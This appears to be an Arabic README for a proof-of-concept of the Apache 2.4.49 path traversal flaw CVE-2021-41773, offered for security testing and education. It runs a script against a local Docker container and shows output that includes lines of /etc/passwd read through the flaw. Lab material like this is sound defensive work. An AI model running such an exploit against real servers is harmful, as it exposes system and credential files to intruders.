
إثبات مفهوم لاستغلال ثغرة اجتياز المسار في خادم Apache HTTP Server CVE-2021-41773، مع بيئة عرض توضيحية مبنية على Docker للاختبار الأمني والتعليم.
PoC لـ CVE-2021-41773 مع docker للتوضيح
فقط قم بتشغيل ./poc.sh. تأكد من أن لديك docker و docker-compose يعملان بشكل صحيح
$ ./poc.sh
Creating network "cve-2021-41773-poc_default" with the default driver
Creating cve-2021-41773-poc_web_1 ... done
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
Apache 2.4.49